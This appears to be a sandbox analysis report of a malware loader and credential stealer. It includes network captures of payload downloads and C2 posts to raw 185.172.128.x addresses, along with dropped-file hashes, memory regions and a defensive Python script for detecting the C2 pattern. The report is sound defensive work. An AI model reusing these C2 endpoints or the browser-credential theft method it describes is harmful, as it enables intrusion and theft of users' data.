            westus2-2.in.ai.monitor.azure.com
            IN CNAME
            westus2-2.in.ai.privatelink.monitor.azure.com
            westus2-2.in.ai.privatelink.monitor.azure.com
            IN CNAME
            gig-ai-prod-westus2-0.trafficmanager.net
            gig-ai-prod-westus2-0.trafficmanager.net
            IN CNAME
            gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com
            gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com
            IN A
            20.9.155.150
          • US
            POST
            https://westus2-2.in.applicationinsights.azure.com/v2/track
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            Remote address:
            20.9.155.150:443
            Request
            POST /v2/track HTTP/1.1
            Content-Type: application/x-json-stream
            Content-Encoding: gzip
            Host: westus2-2.in.applicationinsights.azure.com
            Content-Length: 854
            Expect: 100-continue
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Transfer-Encoding: chunked
            Content-Type: application/json; charset=utf-8
            Server: Microsoft-HTTPAPI/2.0
            Strict-Transport-Security: max-age=31536000
            X-Content-Type-Options: nosniff
            Date: Fri, 10 May 2024 09:30:47 GMT
          • US
            DNS
            172.210.232.199.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            172.210.232.199.in-addr.arpa
            IN PTR
            Response
          • US
            DNS
            150.155.9.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            150.155.9.20.in-addr.arpa
            IN PTR
            Response
          • US
            DNS
            16.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            16.173.189.20.in-addr.arpa
            IN PTR
            Response
          • 185.172.128.90:80
            http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            390 B
            280 B
            4
            3

            HTTP Request

            GET http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0

            HTTP Response

            200
          • 185.172.128.228:80
            http://185.172.128.228/ping.php?substr=eight
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            376 B
            279 B
            4
            3

            HTTP Request

            GET http://185.172.128.228/ping.php?substr=eight

            HTTP Response

            200
          • 185.172.128.59:80
            http://185.172.128.59/syncUpd.exe
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            4.6kB
            243.1kB
            96
            184

            HTTP Request

            GET http://185.172.128.59/syncUpd.exe

            HTTP Response

            200
          • 185.172.128.228:80
            http://185.172.128.228/BroomSetup.exe
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            96.5kB
            5.0MB
            2050
            3747

            HTTP Request

            GET http://185.172.128.228/BroomSetup.exe

            HTTP Response

            200
          • 20.157.87.45:80
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            http
            u18c.1.exe
            836 B
            721 B
            6
            6

            HTTP Request

            POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

            HTTP Response

            200
          • 143.244.56.50:443
            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
            tls, http2
            2.5MB
            61.6MB
            41731
            44307

            HTTP Request

            HEAD https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

            HTTP Response

            200

            HTTP Request

            GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

            HTTP Response

            200
          • 172.217.16.234:443
            chromewebstore.googleapis.com
            tls
            2.6kB
            7.9kB
            17
            17
          • 20.157.87.45:80
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            http
            u18c.1.exe
            836 B
            657 B
            6
            6

            HTTP Request

            POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

            HTTP Response

            200
          • 185.172.128.150:80
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            http
            u18c.0.exe
            339.8kB
            5.4MB
            4185
            4092

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200
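The traffic summary above shows the two halves of the Stealc C2 exchange on one host: repeated multipart/form-data POSTs to a 16-hex-character .php endpoint (the small ones carry check-in/config, the 15 KB and 91 KB ones are answered with Content-Length: 0 and are the exfiltration), interleaved with GETs of sqlite3.dll, freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll from a second 16-hex directory. Those are the SQLite and Mozilla NSS libraries the stealer needs to read browser credential stores, which is why they are fetched between the first check-ins and the large uploads. The following Python is an added detection example written for this page, not code from tria.ge or from the malware; the log lines are constructed from the requests shown above, and the five-field log format, the function names and the `min_dlls` threshold are assumptions. It flags a host only when both halves of the pattern are present, so a lone multipart POST to a hashed .php path or a lone DLL download does not trigger it.

```python
import re
from collections import defaultdict

# Constructed log lines modelled on the requests listed in this report.
# Format is an assumption for this example: "METHOD host path content_type status"
SAMPLE_LOG = """\
POST 185.172.128.150 /c698e1bc8a2f5e6d.php multipart/form-data 200
GET 185.172.128.150 /b7d0cfdb1d966bdd/sqlite3.dll - 200
GET 185.172.128.150 /b7d0cfdb1d966bdd/freebl3.dll - 200
GET 185.172.128.150 /b7d0cfdb1d966bdd/mozglue.dll - 200
GET 185.172.128.150 /b7d0cfdb1d966bdd/nss3.dll - 200
GET 185.172.128.150 /b7d0cfdb1d966bdd/softokn3.dll - 200
POST 185.172.128.150 /c698e1bc8a2f5e6d.php multipart/form-data 200
GET 185.172.128.90 /cpa/ping.php?substr=eight&s=ab&sub=0 - 200
GET 185.172.128.59 /syncUpd.exe - 200
POST westus2-2.in.applicationinsights.azure.com /v2/track application/x-json-stream 200
POST svc.iolo.com /__svc/sbv/DownloadManager.ashx - 200
"""

# C2 endpoint: 16 lowercase hex characters + ".php", always called with multipart POSTs.
GATE_RE = re.compile(r"^/[0-9a-f]{16}\.php$")
# Helper DLLs are served from a second 16-hex directory on the same host.
DLL_DIR_RE = re.compile(r"^/[0-9a-f]{16}/([A-Za-z0-9_]+\.dll)$")
# The SQLite/NSS/CRT set fetched in this report (browser credential-store decryption).
KNOWN_HELPER_DLLS = {
    "sqlite3.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
    "nss3.dll", "softokn3.dll", "vcruntime140.dll",
}


def parse_line(line):
    """Split one constructed log line into (method, host, path, content_type, status)."""
    parts = line.split()
    if len(parts) != 5:
        return None
    method, host, uri, ctype, status = parts
    path = uri.split("?", 1)[0]  # drop the query string before matching the path
    return method, host, path, ctype, status


def find_stealc_hosts(log_text, min_dlls=2):
    """Return {host: evidence} for hosts that show BOTH halves of the pattern:
    at least one multipart POST to /<16hex>.php and at least `min_dlls`
    distinct helper DLLs fetched from /<16hex>/ on that same host."""
    gate_posts = defaultdict(int)
    dlls = defaultdict(set)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        method, host, path, ctype, _status = rec
        if method == "POST" and GATE_RE.match(path) and ctype.startswith("multipart/form-data"):
            gate_posts[host] += 1
        elif method == "GET":
            m = DLL_DIR_RE.match(path)
            if m and m.group(1).lower() in KNOWN_HELPER_DLLS:
                dlls[host].add(m.group(1).lower())
    hits = {}
    for host, n in gate_posts.items():
        if len(dlls[host]) >= min_dlls:
            hits[host] = {"gate_posts": n, "dlls": sorted(dlls[host])}
    return hits


if __name__ == "__main__":
    for host, ev in find_stealc_hosts(SAMPLE_LOG).items():
        print(f"{host}: {ev['gate_posts']} C2 POST(s), helper DLLs {ev['dlls']}")
```

Run against the constructed sample this reports only 185.172.128.150; the loader's ping.php GETs, the payload downloads and the legitimate Application Insights and iolo traffic on the same page do not match. In production logs the request/response sizes above (multi-kilobyte POST bodies answered with an empty 200) are a useful second signal, and the 16-hex path shape should be treated as a heuristic that the operator can change between builds.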
          • 20.9.155.150:443
            https://westus2-2.in.applicationinsights.azure.com/v2/track
            tls, http
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            1.9kB
            5.2kB
            9
            9

            HTTP Request

            POST https://westus2-2.in.applicationinsights.azure.com/v2/track

            HTTP Response

            200
          • 8.8.8.8:53
            104.219.191.52.in-addr.arpa
            dns
            73 B
            147 B
            1
            1

            DNS Request

            104.219.191.52.in-addr.arpa

          • 8.8.8.8:53
            79.190.18.2.in-addr.arpa
            dns
            70 B
            133 B
            1
            1

            DNS Request

            79.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            76.32.126.40.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            76.32.126.40.in-addr.arpa

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
            144 B
            1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            183.142.211.20.in-addr.arpa
            dns
            73 B
            159 B
            1
            1

            DNS Request

            183.142.211.20.in-addr.arpa

          • 8.8.8.8:53
            196.249.167.52.in-addr.arpa
            dns
            73 B
            147 B
            1
            1

            DNS Request

            196.249.167.52.in-addr.arpa

          • 8.8.8.8:53
            241.150.49.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            241.150.49.20.in-addr.arpa

          • 8.8.8.8:53
            103.169.127.40.in-addr.arpa
            dns
            73 B
            147 B
            1
            1

            DNS Request

            103.169.127.40.in-addr.arpa

          • 8.8.8.8:53
            90.128.172.185.in-addr.arpa
            dns
            73 B
            73 B
            1
            1

            DNS Request

            90.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            171.39.242.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            171.39.242.20.in-addr.arpa

          • 8.8.8.8:53
            142.53.16.96.in-addr.arpa
            dns
            71 B
            135 B
            1
            1

            DNS Request

            142.53.16.96.in-addr.arpa

          • 8.8.8.8:53
            228.128.172.185.in-addr.arpa
            dns
            74 B
            74 B
            1
            1

            DNS Request

            228.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            59.128.172.185.in-addr.arpa
            dns
            73 B
            73 B
            1
            1

            DNS Request

            59.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            svc.iolo.com
            dns
            u18c.1.exe
            58 B
            74 B
            1
            1

            DNS Request

            svc.iolo.com

            DNS Response

            20.157.87.45

          • 8.8.8.8:53
            45.87.157.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            45.87.157.20.in-addr.arpa

          • 8.8.8.8:53
            download.iolo.net
            dns
            63 B
            105 B
            1
            1

            DNS Request

            download.iolo.net

            DNS Response

            143.244.56.50

          • 8.8.8.8:53
            50.56.244.143.in-addr.arpa
            dns
            72 B
            114 B
            1
            1

            DNS Request

            50.56.244.143.in-addr.arpa

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
            299 B
            1
            1

            DNS Request

            chromewebstore.googleapis.com

            DNS Response

            172.217.16.234
            142.250.200.10
            142.250.200.42
            216.58.201.106
            216.58.204.74
            172.217.169.10
            216.58.212.202
            172.217.169.74
            172.217.169.42
            142.250.179.234
            142.250.180.10
            142.250.187.202
            142.250.187.234
            142.250.178.10

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
            132 B
            1
            1

            DNS Request

            chromewebstore.googleapis.com

          • 8.8.8.8:53
            234.16.217.172.in-addr.arpa
            dns
            73 B
            142 B
            1
            1

            DNS Request

            234.16.217.172.in-addr.arpa

          • 8.8.8.8:53
            36.56.20.217.in-addr.arpa
            dns
            71 B
            131 B
            1
            1

            DNS Request

            36.56.20.217.in-addr.arpa

          • 8.8.8.8:53
            150.128.172.185.in-addr.arpa
            dns
            74 B
            74 B
            1
            1

            DNS Request

            150.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            westus2-2.in.applicationinsights.azure.com
            dns
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            88 B
            300 B
            1
            1

            DNS Request

            westus2-2.in.applicationinsights.azure.com

            DNS Response

            20.9.155.150

          • 8.8.8.8:53
            172.210.232.199.in-addr.arpa
            dns
            74 B
            128 B
            1
            1

            DNS Request

            172.210.232.199.in-addr.arpa

          • 8.8.8.8:53
            150.155.9.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            150.155.9.20.in-addr.arpa

          • 8.8.8.8:53
            16.173.189.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            16.173.189.20.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\ProgramData\Are.docx

            Filesize

            11KB

            MD5

            a33e5b189842c5867f46566bdbf7a095

            SHA1

            e1c06359f6a76da90d19e8fd95e79c832edb3196

            SHA256

            5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

            SHA512

            f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

          • C:\ProgramData\mozglue.dll

            Filesize

            593KB

            MD5

            c8fd9be83bc728cc04beffafc2907fe9

            SHA1

            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

            SHA256

            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

            SHA512

            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

          • C:\ProgramData\nss3.dll

            Filesize

            2.0MB

            MD5

            1cc453cdf74f31e4d913ff9c10acdde2

            SHA1

            6e85eae544d6e965f15fa5c39700fa7202f3aafe

            SHA256

            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

            SHA512

            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

            Filesize

            2B

            MD5

            d751713988987e9331980363e24189ce

            SHA1

            97d170e1550eee4afc0af065b78cda302a97674c

            SHA256

            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

            SHA512

            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

            Filesize

            40B

            MD5

            20d4b8fa017a12a108c87f540836e250

            SHA1

            1ac617fac131262b6d3ce1f52f5907e31d5f6f00

            SHA256

            6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

            SHA512

            507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

            Filesize

            2KB

            MD5

            8c495c795c53d741fe959895322be606

            SHA1

            45a67386853ba30e37ac1ad62cf7e894f6016ac0

            SHA256

            dedd1144f3fcf89ecd5200790879f72f3a1f32672fff0e415cfe343a7e64d710

            SHA512

            3c65504ce99bfd7aacb19dbfeae532b700987d1afbc93a71dc3b5fe651ab7d53fea5cb8c55ebcb37b4b928030f855af73de07c34e8ee52e095a4a8f2f9b599f5

          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

            Filesize

            3KB

            MD5

            467ee0a0fa395f6400fa0fa13a6ad487

            SHA1

            ba838f6a895ae57a25c03de98e9ceac185ae0caf

            SHA256

            22d550b67d89efe4fe79741252f4bd5c22a985bf17bedead6ae5460dbb839b6a

            SHA512

            99f732824a2f2796760329853f6449363d4a63df7792944ac7d04aa785aa8b5a05d719f88007d337a9323ddf83fe0460763a0691c0b0d8aec420e2fec1ed0510

          • C:\Users\Admin\AppData\Local\Temp\u18c.0.exe

            Filesize

            230KB

            MD5

            cb0f143b280b0c05a99a0f3e8738b677

            SHA1

            1bccf20abd6596cd529764d64de49246478423a5

            SHA256

            d8a59077be36b67679feb9e8f1df536378f2caf9be5e0d8abad95453d8589c79

            SHA512

            a57a0313ecd220540153fad20b96fb8ae61f62cb34fa9c35b4a93df693bf9fc8f55c7e50342603e86ece4ceae68ac86f1cadb61754bd787cf3b32aa085cd867b

          • C:\Users\Admin\AppData\Local\Temp\u18c.1.exe

            Filesize

            4.6MB

            MD5

            397926927bca55be4a77839b1c44de6e

            SHA1

            e10f3434ef3021c399dbba047832f02b3c898dbd

            SHA256

            4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

            SHA512

            cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

          • memory/1596-13-0x0000000000400000-0x0000000002599000-memory.dmp

            Filesize

            33.6MB

          • memory/1596-34-0x0000000000400000-0x0000000002599000-memory.dmp

            Filesize

            33.6MB

          • memory/1596-35-0x00000000041B0000-0x000000000421C000-memory.dmp

            Filesize

            432KB

          • memory/1596-36-0x0000000000400000-0x000000000046F000-memory.dmp

            Filesize

            444KB

          • memory/1596-1-0x00000000025C0000-0x00000000026C0000-memory.dmp

            Filesize

            1024KB

          • memory/1596-4-0x0000000000400000-0x0000000002599000-memory.dmp

            Filesize

            33.6MB

          • memory/1596-3-0x0000000000400000-0x000000000046F000-memory.dmp

            Filesize

            444KB

          • memory/1596-2-0x00000000041B0000-0x000000000421C000-memory.dmp

            Filesize

            432KB

          • memory/2120-171-0x0000000000400000-0x0000000002575000-memory.dmp

            Filesize

            33.5MB

          • memory/2120-133-0x0000000000400000-0x0000000002575000-memory.dmp

            Filesize

            33.5MB

          • memory/2120-93-0x0000000061E00000-0x0000000061EF3000-memory.dmp

            Filesize

            972KB

          • memory/4636-53-0x0000000000400000-0x00000000008AD000-memory.dmp

            Filesize

            4.7MB

          • memory/4636-64-0x0000000000400000-0x00000000008AD000-memory.dmp

            Filesize

            4.7MB

          • memory/4968-73-0x00000170344E0000-0x000001703450A000-memory.dmp

            Filesize

            168KB

          • memory/4968-88-0x0000017039830000-0x0000017039852000-memory.dmp

            Filesize

            136KB

          • memory/4968-75-0x00000170345B0000-0x00000170345D2000-memory.dmp

            Filesize

            136KB

          • memory/4968-76-0x0000017033DF0000-0x0000017033DFA000-memory.dmp

            Filesize

            40KB

          • memory/4968-80-0x00000170345E0000-0x00000170348E0000-memory.dmp

            Filesize

            3.0MB

          • memory/4968-82-0x0000017038FE0000-0x0000017038FE8000-memory.dmp

            Filesize

            32KB

          • memory/4968-83-0x0000017038960000-0x0000017038998000-memory.dmp

            Filesize

            224KB

          • memory/4968-84-0x0000017038930000-0x000001703893E000-memory.dmp

            Filesize

            56KB

          • memory/4968-85-0x0000017038950000-0x0000017038958000-memory.dmp

            Filesize

            32KB

          • memory/4968-86-0x0000017039800000-0x000001703980A000-memory.dmp

            Filesize

            40KB

          • memory/4968-87-0x0000017039AB0000-0x0000017039B12000-memory.dmp

            Filesize

            392KB

          • memory/4968-74-0x0000017034560000-0x00000170345B0000-memory.dmp

            Filesize

            320KB

          • memory/4968-89-0x000001703A040000-0x000001703A568000-memory.dmp

            Filesize

            5.2MB

          • memory/4968-92-0x0000017039810000-0x000001703981C000-memory.dmp

            Filesize

            48KB

          • memory/4968-72-0x00000170341C0000-0x0000017034272000-memory.dmp

            Filesize

            712KB

          • memory/4968-116-0x0000017039920000-0x0000017039996000-memory.dmp

            Filesize

            472KB

          • memory/4968-71-0x00000170341A0000-0x00000170341AA000-memory.dmp

            Filesize

            40KB

          • memory/4968-70-0x0000017033E70000-0x0000017033E94000-memory.dmp

            Filesize

            144KB

          • memory/4968-69-0x000001701B710000-0x000001701B724000-memory.dmp

            Filesize

            80KB

          • memory/4968-68-0x0000017033E10000-0x0000017033E1C000-memory.dmp

            Filesize

            48KB

          • memory/4968-67-0x0000017019DA0000-0x0000017019DB0000-memory.dmp

            Filesize

            64KB

          • memory/4968-66-0x0000017034280000-0x000001703438A000-memory.dmp

            Filesize

            1.0MB

          • memory/4968-172-0x0000017034B00000-0x0000017034B1E000-memory.dmp

            Filesize

            120KB

          • memory/4968-65-0x0000017016150000-0x0000017019984000-memory.dmp

            Filesize

            56.2MB
